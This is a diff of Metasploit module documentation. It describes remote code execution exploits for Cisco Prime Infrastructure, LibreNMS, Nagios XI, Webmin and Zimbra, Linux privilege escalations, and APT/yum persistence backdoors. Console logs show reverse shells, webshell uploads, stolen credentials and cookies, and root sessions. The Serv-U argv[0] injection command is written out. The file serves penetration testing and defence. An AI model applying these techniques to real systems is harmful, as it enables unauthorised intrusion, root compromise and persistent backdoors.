+
+**SCP**
+
+In case you want to transfer files, you will probably use scp. Before you do that, run the following script as admin on CPI. It will generate the credentials you need to scp files:
+
+```
+/opt/CSCOlumos/bin/getSCPcredentials.sh
+```
+
+By default, the CPI's SSH server's authentication method is password, you may end up running scp like this:
+
+```
+scp -r -o PreferredAuthentications=password admin@ip:/tmp/something.zip .
+```
+
+**Out of Space Issues**
+
+Cisco Prime Infrastructure requires a lot of space on the primary server. If it ever reaches to a point where it shuts down unexpectedly, you may not be able to bring the NCS services back again (such as port 80, 443, or 8082). At least for me, I couldn't figure out. If that's the case, you may need to reinstall the VM.
+
+**Unstable HA Connection**
+
+Sometimes the primary and secondary may experience some difficulty staying connected. If this happens, try to do the following on both machines:
+
+1. Run `ncs stop` to stop the services
+2. Run `ncs cleanup`
+3. Run `ncs start`, this may take 10 to 30 minutes to finish.
+4. Finally, run `ncs status` to make sure they are talking.
+
+If the secondary server isn't working with the primary, then the HealthMonitor service may not be in the exploitable condition.
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do `use exploit/linux/http/cpi_tararchive_upload`
+3. Do `set payload` to select the preferred payload
+4. `set rhosts [ip]`
+5. `run`, this should give you a shell
+
+## Scenarios
+
+**Running the check**
+
+```
+msf5 exploit(linux/http/cpi_tararchive_upload) > check
+[*] 192.168.0.23:8082 - The target service is running, but could not be validated.
+```
+
+**Exploiting the service**
+
+```
+msf5 exploit(linux/http/cpi_tararchive_upload) > run
+
+[*] Started reverse TCP handler on 192.168.0.21:4444 
+[*] Uploading tar file (3072 bytes)
+[*] Executing JSP stager...
+[*] Sending stage (985320 bytes) to 192.168.0.23
+[*] Meterpreter session 3 opened (192.168.0.21:4444 -> 192.168.0.23:57127) at 2019-06-07 02:50:13 -0500
+[!] This exploit may require manual cleanup of '/tmp/UdqUlWsFjp.bin' on the target
+[!] This exploit may require manual cleanup of 'apache-tomcat-8.5.16/webapps/ROOT/kmeEmkzdep.jsp' on the target
+
+meterpreter > 
+[+] Deleted /tmp/UdqUlWsFjp.bin
+[+] Deleted apache-tomcat-8.5.16/webapps/ROOT/kmeEmkzdep.jsp
+```
@@ -0,0 +1,65 @@
+## Description
+  
+  In LibreNMS `v1.46` and below, there exists a command injection vulnerability in `capture.inc.php`.
+  The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as
+  a file. The `community` parameter is an unsanitized parameter retrieved through a POST request to `addhost`,
+  and it is used to build the command that is executed in the `capture.inc.php` functionality. The final command
+  is passed to the `popen()` function, which results in execution of arbitrary code.
+
+  This module has been tested on LibreNMS `v1.46` and `v1.45`.
+
+## Vulnerable Application
+
+  A [pre-built OVA](https://github.com/librenms/packer-builds/releases/tag/1.46) can be downloaded via a LibreNMS repo.
+
+  Additionally, vulnerable versions of LibreNMS for Ubuntu can be manually installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/).
+  In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master`, replace `dev-master` with a vulnerable version of the software, ex: `1.46`.
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use exploit/linux/http/librenms_addhost_cmd_inject```
+  4. Do: ```set RHOSTS <ip>```
+  5. Do: ```set USERNAME <user>```
+  6. Do: ```set PASSWORD <pass>```
+  7. Do: ```run```
+  8. You should get a shell.
+
+## Scenarios
+
+### Tested on LibreNMS 1.46 on Ubuntu 18.04
+
+  ```
+  msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
+  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143
+  rhosts => 192.168.37.143
+  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username blah
+  username => blah
+  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password password
+  password => password
+  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1
+  lhost => 192.168.37.1
+  msf5 exploit(linux/http/librenms_addhost_cmd_inject) > run
+
+  [*] Started reverse TCP double handler on 192.168.37.1:4444 
+  [*] Successfully logged into LibreNMS
+  [+] Successfully added device with hostname dFEzcH
+  [*] Accepted the first client connection...
+  [*] Accepted the second client connection...
+  [+] Successfully deleted device with hostname dFEzcH and id #126
+  [*] Command: echo 38eJIFZsiRl3Er48;
+  [*] Writing to socket A
+  [*] Writing to socket B
+  [*] Reading from sockets...
+  [*] Reading from socket A
+  [*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n38eJIFZsiRl3Er48\r\n"
+  [*] Matching...
+  [*] B is input...
+  [*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:55380) at 2019-05-29 15:26:02 -0500
+
+  whoami
+  www-data
+  uname -a
+  Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+  ```
@@ -0,0 +1,116 @@
+# Vulnerable Application
+
+Nagios XI 5.5.6 Root Remote Code Execution
+
+The exploit works as follows:
+
+- A local HTTPS server is setup. When it is reached, this server responds with a payload.
+- By crafting a malicious request, we make the target host send a request to our HTTPS server. Therefore, the local HTTPS server must be reachable from outside your private network (except if the Nagios server is in the same network as yours obviously), this is what the RSRVHOST and RSRVPORT options are for. The malicious request allows for file upload. A PHP webshell and a meterpreter executable are uploaded.
+- A command is executed thanks to the webshell. This command elevates privileges and run the meterpreter executable, giving us a meterpreter session.
+
+# Creating A Testing Environment
+
+- Install a Ubuntu Linux LTS (I used 18.04 LTS for my tests) in a VM.
+- Download Nagios XI 5.5.6 from the official website (https://www.nagios.com/downloads/nagios-xi/older-releases/).
+- Follow the official instructions to install it on your Ubuntu VM (https://assets.nagios.com/downloads/nagiosxi/docs/Installing-Nagios-XI-Manually-on-Linux.pdf).
+
+# Verification Steps
+
+1. `use exploit/linux/http/nagios_xi_root_rce`
+2. `set RHOSTS [IP]`
+3. `set RSRVHOST [IP]`
+4. `exploit`
+
+A meterpreter session should have been opened successfully and you should be root
+
+# Options
+
+## RSRVHOST
+
+IP at which your local HTTPS can be reached. Most of the time it will be a public IP (e.g. your router IP if you have port forwarding).
+
+## RSRVPORT
+
+Port that will forward to your local HTTPS server.
+
+## SRVHOST
+
+IP of your local HTTPS server (must be a local IP).
+
+## SRVPORT
+
+Port to listen to for your local HTTPS server.
+
+# Scenarios
+
+## Nagios 5.5.6 on Ubuntu 18.04 LTS
+
+```
+msf5 exploit(linux/http/nagios_xi_magpie_debug) > show options
+
+Module options (exploit/linux/http/nagios_xi_magpie_debug):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   HTTPDELAY  5                no        Number of seconds the web server will wait before termination
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     172.16.135.129   yes       The target address range or CIDR identifier
+   RPORT      443              yes       The target port (TCP)
+   RSRVHOST   172.16.135.1     yes       A public IP at which your host can be reached (e.g. your router IP)
+   RSRVPORT   8080             yes       The port that will forward to the local HTTPS server
+   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
+   SRVPORT    8080             yes       The local port to listen on.
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                     no        The URI to use for this exploit (default is random)
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.16.135.1     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Nagios XI 5.5.6
+
+
+msf5 exploit(linux/http/nagios_xi_magpie_debug) > run
+[*] Exploit running as background job 0.
+[*] Exploit completed, but no session was created.
+
+[*] Started reverse TCP handler on 172.16.135.1:4444 
+msf5 exploit(linux/http/nagios_xi_magpie_debug) > [*] Using URL: https://0.0.0.0:8080/ixFonv2
+[*] Local IP: https://192.168.0.21:8080/ixFonv2
+[*] Server started.
+[*] nZOnJhGnMb.php uploaded with success!
+[*] Using URL: https://0.0.0.0:8080/mTwEwHtAuz0V
+[*] Local IP: https://192.168.0.21:8080/mTwEwHtAuz0V
+[*] Server started.
+[*] SQmBobwBzw uploaded with success!
+[*] Sending stage (985320 bytes) to 172.16.135.129
+[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.129:33090) at 2019-06-25 16:13:01 -0500
+[+] Deleted /usr/local/nagvis/share/nZOnJhGnMb.php
+[+] Deleted /usr/local/nagvis/share/SQmBobwBzw
+[!] This exploit may require manual cleanup of '/var/tmp/mtrhbwFZHa.nse' on the target
+[*] Server stopped.
+
+msf5 exploit(linux/http/nagios_xi_magpie_debug) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer     : 172.16.135.129
+OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
+Architecture : x64
+BuildTuple   : i486-linux-musl
+Meterpreter  : x86/linux
+meterpreter > 
+```
@@ -0,0 +1,54 @@
+## Description
+
+This module exploits an arbitrary command execution vulnerability in Webmin
+1.910 and lower versions. any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.
+
+## Vulnerable Application
+
+This module has been tested with [Webmin 1.910](https://sourceforge.net/projects/webadmin/files/webmin/1.910/)
+
+## Verification Steps
+
+1. `use exploit/lunix/http/webmin_packageup_rce`
+2. `set rhosts <rhost>`
+3. `set username <username>`
+4. `set password <password>`
+5. `exploit`
+
+## Scenarios
+
+### Tested Webmin 1.910 on Debian Linux 4.19.28-2kali1 x64
+
+```
+msf5 >
+msf5 > use exploit/linux/http/webmin_packageup_rce
+msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9
+RHOSTS => 192.168.1.9
+msf5 exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python
+PAYLOAD => cmd/unix/reverse_python
+msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.12
+LHOST => 192.168.1.12
+msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME rce
+USERNAME => rce
+msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD password
+PASSWORD => password
+msf5 exploit(linux/http/webmin_packageup_rce) > check
+
+[*] NICE! rce has the right to >>Package Update<<
+[+] 192.168.1.9:10000 - The target is vulnerable.
+msf5 exploit(linux/http/webmin_packageup_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.12:4444 
+[+] Session cookie: 1947b5dfd62403b8f1f58f497e88b1e5
+[*] Attempting to execute the payload...
+[*] Command shell session 12 opened (192.168.1.12:4444 -> 192.168.1.9:47552) at 2019-06-16 18:21:46 -0400
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux AkkuS 4.19.0-kali4-amd64 #1 SMP Debian 4.19.28-2kali1 (2019-03-18) x86_64 GNU/Linux
+pwd
+/usr/share/webmin/package-updates/
+exit
+```
+
@@ -0,0 +1,48 @@
+## Description
+
+This module exploits an XML external entity vulnerability and a server side request forgery to get unauthenticated code execution on Zimbra Collaboration Suite. The XML external entity vulnerability in the Autodiscover Servlet is used to read a Zimbra configuration file that contains an LDAP password for the 'zimbra' account. The zimbra credentials are then used to get a user authentication cookie with an AuthRequest message. Using the user cookie, a server side request forgery in the Proxy Servlet is used to proxy an AuthRequest with the 'zimbra' credentials to the admin port to retrieve an admin cookie. After gaining an admin cookie the ClientUploader is used to upload a JSP webshell that can be triggered from the web server to get command execution on the host. The issues reportedly affect Zimbra Collaboration Suite v8.5 to v8.7.11. This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.
+
+## Vulnerable Application
+
+Zimbra Collaboration Suite v8.5 to v8.7.11.
+
+[Zimbra 8.7.1 GA FOSS Edition](https://files.zimbra.com/downloads/8.7.1_GA/zcs-8.7.1_GA_1670.UBUNTU16_64.20161025045114.tgz)
+
+[Installation](https://zimbra.github.io/installguides/latest/single.html#Installing_Zimbra_Collaboration_Software)
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `use exploit/linux/http/zimbra_xxe_rce`
+3. `set rhosts <rhost>`
+4. `set lhost <lhost>`
+5. `exploit`
+
+## Scenarios
+
+### Zimbra 8.7.1 GA 1670 FOSS edition Tested on Ubuntu 16.04.6 LTS
+
+```
+msf5 exploit(linux/http/zimbra_xxe_rce) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] Using URL: http://0.0.0.0:8080/2tQ75DxRvaeGRSP
+[*] Local IP: http://192.168.171.150:8080/2tQ75DxRvaeGRSP
+[*] Server started.
+[+] Password found: Syz7fOPJI
+[+] User cookie retrieved: ZM_AUTH_TOKEN=0_c6df3ed73afbefd7eff40eb9f6999794ebf764b5_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343239343539303239353b747970653d363a7a696d6272613b753d313a613b7469643d393a3538303338373138373b;
+[+] Admin cookie retrieved: ZM_ADMIN_AUTH_TOKEN=0_c1c8a6c715eb8f55c14aa63e82a8ff64e4fbe279_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313535343136343939303333353b61646d696e3d313a313b747970653d363a7a696d6272613b753d313a613b7469643d383a36303437383736333b;
+[*] Uploading jsp shell
+[*] Executing payload on /downloads/XFlHBolHjLB.jsp
+[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.111:53746) at 2019-04-01 07:29:51 -0500
+[*] Server stopped.
+
+whoami
+zimbra
+uname -a
+Linux zimbra.mylocaldomain.local 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+../bin/zmcontrol -v
+Release 8.7.1.GA.1670.UBUNTU16.64 UBUNTU16_64 FOSS edition.
+exit
+[*] 172.22.222.111 - Command shell session 1 closed.
+```
@@ -1,19 +1,25 @@
 ## Description

-  This module attempts to gain root privileges on Fedora systems with a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured as the crash handler.
+  This module attempts to gain root privileges on Linux systems with
+  a vulnerable version of Automatic Bug Reporting Tool (ABRT) configured
+  as the crash handler.


 ## Vulnerable Application

-  A race condition in ABRT allows local users to change ownership of arbitrary files (CVE-2015-3315). This module uses a symlink attack on `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`, then adds a new user with UID=0 GID=0 to gain root privileges. Winning the race could take a few minutes.
+  A race condition allows local users to change ownership of arbitrary
+  files (CVE-2015-3315). This module uses a symlink attack on
+  `/var/tmp/abrt/*/maps` to change the ownership of `/etc/passwd`,
+  then adds a new user with UID=0 GID=0 to gain root privileges.
+  Winning the race could take a few minutes.

-  This module has been tested successfully on ABRT packaged versions:
+  This module has been tested successfully on:

-  * 2.1.5-1.fc19 on Fedora Desktop 19 x86_64
-  * 2.2.1-1.fc19 on Fedora Desktop 19 x86_64
-  * 2.2.2-2.fc20 on Fedora Desktop 20 x86_64
-
-  Fedora 21 and Red Hat 7 systems are reportedly affected, but untested.
+  * abrt 2.1.11-12.el7 on RHEL 7.0 x86_64
+  * abrt 2.1.5-1.fc19 on Fedora Desktop 19 x86_64
+  * abrt 2.2.1-1.fc19 on Fedora Desktop 19 x86_64
+  * abrt 2.2.2-2.fc20 on Fedora Desktop 20 x86_64
+  * abrt 2.3.0-3.fc21 on Fedora Desktop 21 x86_64


 ## Verification Steps
@@ -0,0 +1,66 @@
+## Description
+
+This module will run a payload when the package manager is used. No
+handler is ran automatically so you must configure an appropriate
+exploit/multi/handler to connect. This module creates a pre-invoke hook
+for APT in apt.conf.d. The hook name syntax is numeric followed by text.
+
+## Verification Steps
+
+1. Exploit a box that uses APT
+2. `use linux/local/apt_package_manager_persistence`
+3. `set SESSION <id>`
+4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
+5. `exploit`
+
+When the system runs apt-get update the payload will launch.  You must set handler accordingly.
+
+## Options
+
+**BACKDOOR_NAME**
+
+Name of backdoor executable
+
+**HOOKNAME**
+
+Name of pre-invoke hook to be installed in /etc/apt/apt.conf.d/. Pre-invoke hook name syntax is numeric followed by text.
+
+**WritableDir**
+
+Writable directory for backdoor default is (/usr/local/bin/)
+
+## Scenarios
+
+### Tested on Ubuntu 18.04.2 LTS
+
+```
+msf5 > use exploit/linux/local/apt_package_manager_persistence
+msf5 exploit(linux/local/apt_package_manager_persistence) > handler -p linux/x86/meterpreter/reverse_tcp -H 172.22.222.136 -P 4444
+[*] Payload handler running as background job 0.
+msf5 exploit(linux/local/apt_package_manager_persistence) > 
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] Sending stage (985320 bytes) to 172.22.222.130
+[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.130:60526) at 2019-04-26 13:04:33 -0500
+
+msf5 exploit(linux/local/apt_package_manager_persistence) > set session 1
+session => 1
+msf5 exploit(linux/local/apt_package_manager_persistence) > set payload linux/x86/meterpreter/reverse_tcp 
+payload => linux/x86/meterpreter/reverse_tcp
+msf5 exploit(linux/local/apt_package_manager_persistence) > set lhost 172.22.222.136 
+lhost => 172.22.222.136
+msf5 exploit(linux/local/apt_package_manager_persistence) > set lport 4444
+lport => 4444
+msf5 exploit(linux/local/apt_package_manager_persistence) > exploit
+
+[*] Attempting to write hook:
+[*] Wrote /etc/apt/apt.conf.d/34bmUIzfd
+[*] Backdoor uploaded /usr/local/bin/dbmqKeh6U9
+[*] Backdoor will run on next APT update
+msf5 exploit(linux/local/apt_package_manager_persistence) > 
+[*] Sending stage (985320 bytes) to 172.22.222.130
+[*] Meterpreter session 2 opened (172.22.222.136:4444 -> 172.22.222.130:60528) at 2019-04-26 13:05:17 -0500
+
+msf5 exploit(linux/local/apt_package_manager_persistence) >
+```
+
+Note: Second session comes in after running `apt update` on the remote host
@@ -25,6 +25,7 @@
  * Ubuntu 14.04.1 kernel 4.4.0-89-generic;
  * Ubuntu 16.04.2 kernel 4.8.0-45-generic;
  * Ubuntu 16.04.3 kernel 4.10.0-28-generic;
+  * Ubuntu 16.04.5 kernel 4.4.0-116-generic;
  * Ubuntu 17.04 kernel 4.10.0-19-generic;
  * ZorinOS 12.1 kernel 4.8.0-39-generic.

@@ -0,0 +1,22 @@
+## Description
+
+This modules exploits a vulnerability in Cisco Prime Infrastructure's runrshell binary. The runrshell binary is meant to execute a shell script as root, but can be abused to inject extra commands in the argument, allowing you to execute anything as root. It was originally discovered by Pedro Ribeiro, and chained in the CVE-2018-15379 exploit.
+
+## Demo
+
+```
+msf5 exploit(linux/local/cpi_runrshell_priv_esc) > run
+
+[*] Started reverse TCP handler on 192.168.0.21:4444 
+[*] Uploading /tmp/mYVrqmsETa.bin
+[*] chmod the file with +x
+[*] Executing /tmp/mYVrqmsETa.bin
+[*] Sending stage (985320 bytes) to 192.168.0.23
+[*] Meterpreter session 4 opened (192.168.0.21:4444 -> 192.168.0.23:55554) at 2019-06-10 11:18:13 -0500
+[+] Deleted /tmp/mYVrqmsETa.bin
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > 
+```
+
@@ -1,25 +1,33 @@
 ## Description

-  This module attempts to gain root privileges on Linux systems by abusing a vulnerability in the GNU C Library (glibc) dynamic linker - aka glibc `$ORIGIN` expansion vulnerability.
+  This module attempts to gain root privileges on Linux systems by abusing
+  a vulnerability in the GNU C Library (glibc) dynamic linker.


 ## Vulnerable Application

-  glibc `ld.so` in versions before 2.11.3, and 2.12.x before 2.12.2 does not properly restrict use of the `LD_AUDIT` environment variable when loading setuid executables. This allows control over the `$ORIGIN` library search path resulting in execution of arbitrary shared objects.
+  glibc `ld.so` versions before 2.11.3, and 2.12.x before 2.12.2 does not
+  properly restrict use of the `LD_AUDIT` environment variable when loading
+  setuid executables which allows control over the `$ORIGIN` library search
+  path resulting in execution of arbitrary shared objects.

-  This module opens a file descriptor to the specified suid executable via a hard link, then replaces the hard link with a shared object before instructing the linker to execute the file descriptor, resulting in arbitrary code execution.
+  This module opens a file descriptor to the specified suid executable via
+  a hard link, then replaces the hard link with a shared object before
+  instructing the linker to execute the file descriptor, resulting in
+  arbitrary code execution.

-  The specified setuid binary must be readable and located on the same file system partition as the specified writable directory.
+  The specified setuid binary must be readable and located on the same
+  file system partition as the specified writable directory.

  This module has been tested successfully on:

  * glibc 2.5 on CentOS 5.4 (x86_64)
  * glibc 2.5 on CentOS 5.5 (x86_64)
-  * glibc 2.12 on Fedora 13 (i386, x86_64)
+  * glibc 2.12 on Fedora 13 (i386)
+  * glibc 2.5-49 on RHEL 5.5 (x86_64)

-  RHEL 5 is reportedly affected, but untested.
-
-  Some versions of `ld.so`, such as the version shipped with Ubuntu 14, hit a failed assertion in `dl_open_worker` causing exploitation to fail.
+  Some versions of `ld.so`, such as the version shipped with Ubuntu 14,
+  hit a failed assertion in `dl_open_worker` causing exploitation to fail.


 ## Verification Steps
@@ -0,0 +1,76 @@
+## Description
+
+  This module attempts to gain root privileges on systems running
+  Serv-U FTP Server versions prior to 15.1.7.
+
+  The `Serv-U` executable is setuid `root`, and uses `ARGV[0]`
+  in a call to `system()`, without validation, when invoked with
+  the `-prepareinstallation` flag, resulting in command execution
+  with root privileges.
+
+
+## Vulnerable Application
+
+  [Serv-U FTP Server](https://www.serv-u.com/ftp-server-software)
+  is an FTP server for Linux and Windows; however, this module
+  targets only Linux systems.
+
+  This module has been tested successfully on:
+
+  * Serv-U FTP Server version 15.1.6 (x64) on Debian 9.6 (x64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SERVU_PATH**
+
+  Path to `Serv-U` executable (default: `/usr/local/Serv-U/Serv-U`)
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+### Debian 9.6 (x64)
+
+  ```
+  msf5 exploit(multi/handler) > back
+  msf5 > use exploit/linux/local/servu_ftp_server_prepareinstallation_priv_esc 
+  msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/servu_ftp_server_prepareinstallation_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [+] bash shell is available
+  [+] /usr/local/Serv-U/Serv-U is executable
+  [+] /usr/local/Serv-U/Serv-U is setuid
+  [*] Writing '/tmp/.24HnCiwSby' (277 bytes) ...
+  [*] Executing command: bash -c 'exec -a "\";chown root /tmp/.24HnCiwSby;chmod u+s /tmp/.24HnCiwSby;chmod +x /tmp/.24HnCiwSby\"" /usr/local/Serv-U/Serv-U -prepareinstallation'
+  [+] /tmp/.24HnCiwSby setuid root successfully
+  [*] Executing payload...
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.250
+
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.250:58662) at 2019-06-28 23:46:48 -0400
+  [-] Failed to delete /tmp/.24HnCiwSby: stdapi_fs_delete_file: Operation failed: 1
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > 
+  ```
+
@@ -0,0 +1,114 @@
+## Description
+
+  This module attempts to gain root privileges by exploiting a
+  vulnerability in the `staprun` executable included with SystemTap
+  version 1.3.
+
+  The `staprun` executable does not clear environment variables prior to
+  executing `modprobe`, allowing an arbitrary configuration file to be
+  specified in the `MODPROBE_OPTIONS` environment variable, resulting
+  in arbitrary command execution with root privileges.
+
+
+## Vulnerable Application
+
+  This module has been tested successfully on:
+
+  * systemtap 1.2-1.fc13-i686 on Fedora 13 (i686)
+  * systemtap 1.1-3.el5 on RHEL 5.5 (x64)
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/systemtap_modprobe_options_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **STAPRUN_PATH**
+
+  Path to staprun executable (default: `/usr/bin/staprun`)
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+### Red Hat Enterprise Linux 5.5 (x64)
+
+  ```
+  msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc
+  msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run
+  
+  [*] Started reverse TCP handler on 172.16.191.165:4444
+  [+] /usr/bin/staprun is executable
+  [+] /usr/bin/staprun is setuid
+  [*] Writing '/tmp/.rX9IoM53YEb92' (207 bytes) ...
+  [*] Writing '/tmp/.rX9IoM53YEb92.conf' (23 bytes) ...
+  [*] Executing payload...
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.202
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.202:52074) at 2019-04-18 12:50:56 -0400
+  [+] Deleted /tmp/.rX9IoM53YEb92
+  [+] Deleted /tmp/.rX9IoM53YEb92.conf
+  ERROR: Unable to canonicalize path "/lib/modules/2.6.18-194.el5/systemtap/As5A2hFpvQ2L.ko": No such file or directory
+  Retrying, after attempted removal of module As5A2hFpvQ2L (rc -1)
+  ERROR: Unable to canonicalize path "/lib/modules/2.6.18-194.el5/systemtap/As5A2hFpvQ2L.ko": No such file or directory
+  
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo 
+  Computer     : localhost.localdomain
+  OS           : Red Hat Enterprise Linux 5 (Linux 2.6.18-194.el5)
+  Architecture : x64
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter > 
+  ```
+
+### Fedora 13 (x86)
+
+  ```
+  msf5 > use exploit/linux/local/systemtap_modprobe_options_priv_esc
+  msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > set verbose true
+  verbose => true
+  msf5 exploit(linux/local/systemtap_modprobe_options_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.165:4444
+  [+] /usr/bin/staprun is executable
+  [+] /usr/bin/staprun is setuid
+  [*] Writing '/tmp/.otCyN6cAa7aUo0v' (207 bytes) ...
+  [*] Writing '/tmp/.otCyN6cAa7aUo0v.conf' (23 bytes) ...
+  [*] Executing payload...
+  [*] Transmitting intermediate stager...(106 bytes)
+  [*] Sending stage (985320 bytes) to 172.16.191.138
+  ERROR: Unable to canonicalize path "/lib/modules/2.6.33.3-85.fc13.i686.PAE/systemtap/l0rDp93O8f.ko": No such file or directory
+  Retrying, after attempted removal of module l0rDp93O8f (rc -1)
+  ERROR: Unable to canonicalize path "/lib/modules/2.6.33.3-85.fc13.i686.PAE/systemtap/l0rDp93O8f.ko": No such file or directory
+  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.138:33541) at 2019-04-19 07:26:46 -0400
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : fedora13.localdomain
+  OS           : Fedora 13 (Linux 2.6.33.3-85.fc13.i686.PAE)
+  Architecture : i686
+  BuildTuple   : i486-linux-musl
+  Meterpreter  : x86/linux
+  meterpreter >
+  ```
+
@@ -0,0 +1,84 @@
+## Description
+
+This module will run a payload when the package manager is used. No
+handler is ran automatically so you must configure an appropriate
+exploit/multi/handler to connect. Module modifies a yum plugin to
+launch a binary of choice. grep -F 'enabled=1' /etc/yum/pluginconf.d/
+will show what plugins are currently enabled on the system.
+
+## Verification Steps
+
+1. Exploit a box that uses Yum 
+2. `use linux/local/yum_package_manager_persistence`
+3. `set SESSION <id>`
+4. `set PAYLOAD cmd/unix/reverse_python` configure the payload as needed
+5. `exploit`
+
+When the system runs yum update the payload will launch.  You must set handler accordingly.
+
+## Options
+
+**BACKDOOR_NAME**
+Name of backdoor executable
+ 
+**PLUGIN**
+Name of the yum plugin to target 
+  
+**WritableDir**
+Writable directory for backdoor default is (/usr/local/bin/)       
+
+**PluginPath**
+Plugin path to use default is (/usr/lib/yum-plugins/)
+
+## Scenarios
+
+### Tested on Fedora 21
+
+```
+msf5 exploit(linux/local/yum_package_manager_persistence) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type             Information  Connection
+  --  ----  ----             -----------  ----------
+  1         shell x86/linux               172.22.222.136:4444 -> 172.22.222.135:43790 (172.22.222.135)
+
+msf5 exploit(linux/local/yum_package_manager_persistence) > set session 1
+session => 1
+msf5 exploit(linux/local/yum_package_manager_persistence) > set plugin langpacks
+plugin => langpacks
+msf5 exploit(linux/local/yum_package_manager_persistence) > set lhost 172.22.222.136 
+lhost => 172.22.222.136
+msf5 exploit(linux/local/yum_package_manager_persistence) > exploit
+
+[*] /usr/lib/yum-plugins/langpacks.py
+[+] Plugins are enabled!
+[*] Attempting to modify plugin
+[*] Backdoor uploaded to /usr/local/bin/z9fJTx2wVg
+[*] Backdoor will run on next Yum update
